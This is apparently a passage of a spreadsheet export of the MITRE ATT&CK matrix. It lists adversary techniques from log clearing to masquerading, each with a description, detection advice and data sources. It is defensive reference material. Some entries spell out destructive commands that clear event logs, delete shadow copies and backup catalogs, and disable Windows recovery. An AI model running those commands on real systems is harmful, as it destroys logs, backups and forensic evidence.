* &lt;code&gt;wevtutil cl application&lt;/code&gt;
* &lt;code&gt;wevtutil cl security&lt;/code&gt;
These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/001</t>
  </si>
  <si>
    <t>Deleting Windows event logs (via native binaries (Citation: Microsoft wevtutil Oct 2017), API functions (Citation: Microsoft EventLog.Clear), or [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation: Microsoft Clear-EventLog)) may also generate an alterable event (Event ID 1102: "The audit log was cleared").</t>
  </si>
  <si>
    <t>Anti Virus, Host Intrusion Prevention Systems, Log Analysis</t>
  </si>
  <si>
    <t>T1070.004</t>
  </si>
  <si>
    <t>Indicator Removal on Host: File Deletion</t>
  </si>
  <si>
    <t>Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/004</t>
  </si>
  <si>
    <t>It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion</t>
  </si>
  <si>
    <t>T1070.005</t>
  </si>
  <si>
    <t>Indicator Removal on Host: Network Share Connection Removal</t>
  </si>
  <si>
    <t>Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the &lt;code&gt;net use \\system\share /delete&lt;/code&gt; command. (Citation: Technet Net Use)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/005</t>
  </si>
  <si>
    <t>Network share connections may be common depending on how an network environment is used. Monitor command-line invocation of &lt;code&gt;net use&lt;/code&gt; commands associated with establishing and removing remote shares over SMB, including following best practices for detection of [Windows Admin Shares](https://attack.mitre.org/techniques/T1077). SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity. Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.</t>
  </si>
  <si>
    <t>Command: Command Execution, Network Traffic: Network Traffic Content, Process: Process Creation, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1070.006</t>
  </si>
  <si>
    <t>Indicator Removal on Host: Timestomp</t>
  </si>
  <si>
    <t>Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/006</t>
  </si>
  <si>
    <t>Forensic techniques exist to detect aspects of files that have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques) It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values.</t>
  </si>
  <si>
    <t>File: File Metadata, File: File Modification</t>
  </si>
  <si>
    <t>Romain Dumont, ESET</t>
  </si>
  <si>
    <t>T1202</t>
  </si>
  <si>
    <t>Indirect Command Execution</t>
  </si>
  <si>
    <t>Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1202</t>
  </si>
  <si>
    <t>Monitor and analyze logs from host-based detection mechanisms, such as Sysmon, for events such as process creations that include or are resulting from parameters associated with invoking programs/commands/files and/or spawning child processes/network connections. (Citation: RSA Forfiles Aug 2017)</t>
  </si>
  <si>
    <t>Application control, Application control by file name or path, Static File Analysis</t>
  </si>
  <si>
    <t>T1105</t>
  </si>
  <si>
    <t>Ingress Tool Transfer</t>
  </si>
  <si>
    <t>Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1105</t>
  </si>
  <si>
    <t>Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.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</si>
  <si>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File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1490</t>
  </si>
  <si>
    <t>Inhibit System Recovery</t>
  </si>
  <si>
    <t>Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)
A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:
* &lt;code&gt;vssadmin.exe&lt;/code&gt; can be used to delete all volume shadow copies on a system - &lt;code&gt;vssadmin.exe delete shadows /all /quiet&lt;/code&gt;
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - &lt;code&gt;wmic shadowcopy delete&lt;/code&gt;
* &lt;code&gt;wbadmin.exe&lt;/code&gt; can be used to delete the Windows Backup Catalog - &lt;code&gt;wbadmin.exe delete catalog -quiet&lt;/code&gt;
* &lt;code&gt;bcdedit.exe&lt;/code&gt; can be used to disable automatic Windows recovery features by modifying boot configuration data - &lt;code&gt;bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures &amp; bcdedit /set {default} recoveryenabled no&lt;/code&gt;</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1490</t>
  </si>
  <si>
    <t>02 April 2019</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.
Monitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of &lt;code&gt;HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage&lt;/code&gt;).</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion, Process: Process Creation, Service: Service Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Yonatan Gotlib, Deep Instinct</t>
  </si>
  <si>
    <t>T1056</t>
  </si>
  <si>
    <t>Input Capture</t>
  </si>
  <si>
    <t>Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056</t>
  </si>
  <si>
    <t>Collection, Credential Access</t>
  </si>
  <si>
    <t>Detection may vary depending on how input is captured but may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke), monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), and ensuring no unauthorized drivers or kernel modules that could indicate keylogging or API hooking are present.</t>
  </si>
  <si>
    <t>Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1056.004</t>
  </si>
  <si>
    <t>Input Capture: Credential API Hooking</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056/004</t>
  </si>
  <si>
    <t>Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)</t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Metadata</t>
  </si>
  <si>
    <t>T1056.002</t>
  </si>
  <si>
    <t>Input Capture: GUI Input Capture</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).
Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as AppleScript(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and PowerShell(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015). </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056/002</t>
  </si>
  <si>
    <t>Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials.
Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.</t>
  </si>
  <si>
    <t>Process: Process Creation</t>
  </si>
  <si>
    <t>Matthew Molyett, @s1air, Cisco Talos</t>
  </si>
  <si>
    <t>T1056.001</t>
  </si>
  <si>
    <t>Input Capture: Keylogging</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.
Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:
* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
* Reading raw keystroke data from the hardware buffer.
* Windows Registry modifications.
* Custom drivers.
* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056/001</t>
  </si>
  <si>
    <t>Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`.(Citation: Adventures of a Keystroke) Monitor the Registry and file system for such changes, monitor driver installs, and look for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.</t>
  </si>
  <si>
    <t>Driver: Driver Load, Process: OS API Execution, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1056.003</t>
  </si>
  <si>
    <t>Input Capture: Web Portal Capture</t>
  </si>
  <si>
    <t>Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056/003</t>
  </si>
  <si>
    <t>File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.</t>
  </si>
  <si>
    <t>File: File Modification</t>
  </si>
  <si>
    <t>T1559</t>
  </si>
  <si>
    <t>Inter-Process Communication</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</si>
  <si>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 
Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1559</t>
  </si>
  <si>
    <t>Monitor for strings in files/commands, loaded DLLs/libraries, or spawned processes that are associated with abuse of IPC mechanisms.</t>
  </si>
  <si>
    <t>Module: Module Load, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1559.001</t>
  </si>
  <si>
    <t>Inter-Process Communication: Component Object Model</t>
  </si>
  <si>
    <t>Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM)
Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1559/001</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)
Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on. </t>
  </si>
  <si>
    <t>T1559.002</t>
  </si>
  <si>
    <t>Inter-Process Communication: Dynamic Data Exchange</t>
  </si>
  <si>
    <t>Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.
Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)
Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1559/002</t>
  </si>
  <si>
    <t>Monitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe).
OLE and Office Open XML files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution.(Citation: NVisio Labs DDE Detection Oct 2017)</t>
  </si>
  <si>
    <t>T1534</t>
  </si>
  <si>
    <t>Internal Spearphishing</t>
  </si>
  <si>
    <t>Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack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attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017)
Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces.
There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1534</t>
  </si>
  <si>
    <t>Network intrusion detection systems and email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing attacks.(Citation: Trend Micro When Phishing Starts from the Inside 2017)</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC); Tim MalcomVetter</t>
  </si>
  <si>
    <t>T1570</t>
  </si>
  <si>
    <t>Lateral Tool Transfer</t>
  </si>
  <si>
    <t>Adversaries may transfer tools or other files between systems in a compromised environment. Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files laterally between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1570</t>
  </si>
  <si>
    <t>Monitor for file creation and files transferred within a network using protocols such as SMB. Unusual processes with internal network connections creating files on-system may be suspicious. Consider monitoring for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Metadata, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1185</t>
  </si>
  <si>
    <t>Man in the Browser</t>
  </si>
  <si>
    <t>Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser)
A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser Pivot) (Citation: ICEBRG Chrome Extensions)
Browser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication. (Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1185</t>
  </si>
  <si>
    <t>This is a difficult technique to detect because adversary traffic would be masked by normal user traffic. No new processes are created and no additional software touches disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for process injection against browser applications.</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Process: Process Access</t>
  </si>
  <si>
    <t>Justin Warner, ICEBRG</t>
  </si>
  <si>
    <t>T1557</t>
  </si>
  <si>
    <t>Man-in-the-Middle</t>
  </si>
  <si>
    <t>Adversaries may attempt to position themselves between two or more networked devices using a man-in-the-middle (MiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)
Adversaries may leverage the MiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1557</t>
  </si>
  <si>
    <t>Monitor network traffic for anomalies associated with known MiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Flow, Network Traffic: Network Traffic Flow, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project</t>
  </si>
  <si>
    <t>T1557.002</t>
  </si>
  <si>
    <t>Man-in-the-Middle: ARP Cache Poisoning</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).
The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.
An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to man-in-the-middle (MiTM) network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1557/002</t>
  </si>
  <si>
    <t>Monitor network traffic for unusual ARP traffic, gratuitous ARP replies may be suspicious. 
Consider collecting changes to ARP caches across endpoints for signs of ARP poisoning. For example, if multiple IP addresses map to a single MAC address, this could be an indicator that the ARP cache has been poisoned.</t>
  </si>
  <si>
    <t>Jon Sternstein, Stern Security</t>
  </si>
  <si>
    <t>T1557.001</t>
  </si>
  <si>
    <t>Man-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay</t>
  </si>
  <si>
    <t>By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. 
Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)
Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)
Several tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1557/001</t>
  </si>
  <si>
    <t>Monitor &lt;code&gt;HKLM\Software\Policies\Microsoft\Windows NT\DNSClient&lt;/code&gt; for changes to the "EnableMulticast" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)
Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.
Deploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)</t>
  </si>
  <si>
    <t>Eric Kuehn, Secure Ideas; Matthew Demaske, Adaptforward</t>
  </si>
  <si>
    <t>T1036</t>
  </si>
  <si>
    <t>Masquerading</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</si>
  <si>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
Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036</t>
  </si>
  <si>
    <t>Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
